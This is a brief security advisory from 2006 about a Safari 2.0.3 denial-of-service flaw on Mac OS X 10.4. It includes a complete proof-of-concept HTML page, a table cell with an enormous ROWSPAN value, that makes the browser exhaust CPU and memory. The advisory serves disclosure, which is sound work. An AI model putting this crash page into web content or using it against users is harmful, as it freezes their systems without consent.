|
Brought to you by:
Suppliers of:
|
|
|
| |
Safari web browser is developed by Apple and available as part of the Mac OS X operating system.
Opening a specially crafted web page causes Safari to crash. |
| |
Credit:
The information has been provided by Yannick von Arx.
The original article can be found at: http://www.yanux.ch/exploits/safari/bugreport_imac_g4.txt
|
| |
Vulnerable Systems:
* Safari 2.0.3 (417.9.2) latest version under 10.4.5 (Build 8H14)
* Safari 2.0.3 (417.9.2) latest version under 10.4.6 (Build 8I127)
* Prior versions may also be affected.
Example:
Create a new File with following code:
<HTML>
<BODY>
<TABLE>
<TR>
<TD ROWSPAN=2000000000>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
Save it as a .html file (example.html) now open it in Safari. The application takes a lot of CPU and RAM slowing down the
operating system SRCOD (Spinning Rainbow Cursor Of Death), and it is no longer possible to use OSX.
For an online example visit: http://www.yanux.ch/exploits/safari/example.html
Vendor Status:
Apple has notified of this issues on 04/23/2006
Solution:
Currently no patches have been released for this vulnerability.
|
|
|
|
|